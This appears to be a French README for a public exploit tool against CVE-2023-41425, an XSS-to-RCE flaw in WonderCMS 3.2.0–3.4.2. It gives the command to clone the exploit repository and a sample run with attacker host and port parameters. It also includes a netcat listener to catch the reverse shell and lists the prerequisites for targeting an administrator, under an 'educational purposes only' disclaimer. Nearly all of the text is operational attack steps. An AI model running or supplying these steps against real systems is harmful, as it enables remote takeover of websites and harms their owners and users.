
CVE-2023-41425 - Vulnérabilité de Cross Site Scripting dans Wonder CMS v.3.2.0 à v.3.4.2 permet à un attaquant distant d'exécuter du code arbitraire via un script malveillant téléchargé vers le composant installModule.
Vulnérabilité de Cross Site Scripting dans Wonder CMS v.3.2.0 à v.3.4.2 permet à un attaquant distant d'exécuter du code arbitraire via un script malveillant téléchargé sur le composant installModule. À des fins éducatives uniquement
Nécessite la connaissance de l'URL de connexion, un accès administrateur ou la capacité d'amener l'administrateur à cliquer sur le lien XSS.
git clone https://github.com/thefizzyfish/CVE-2023-41425-wonderCMS_RCE.git
usage: CVE-2023-41425.py [-h] -rhost RHOST -lhost LHOST -lport LPORT -sport SPORT
python3 CVE-2023-41425.py -rhost http://example.com/loginURL -lhost 10.10.14.7 -lport 9001 -sport 8000
nc -lnvp 9001

prodigiousMind pour avoir découvert et signalé la vulnérabilité https://gist.github.com/prodigiousMind/fc69a79629c4ba9ee88a7ad526043413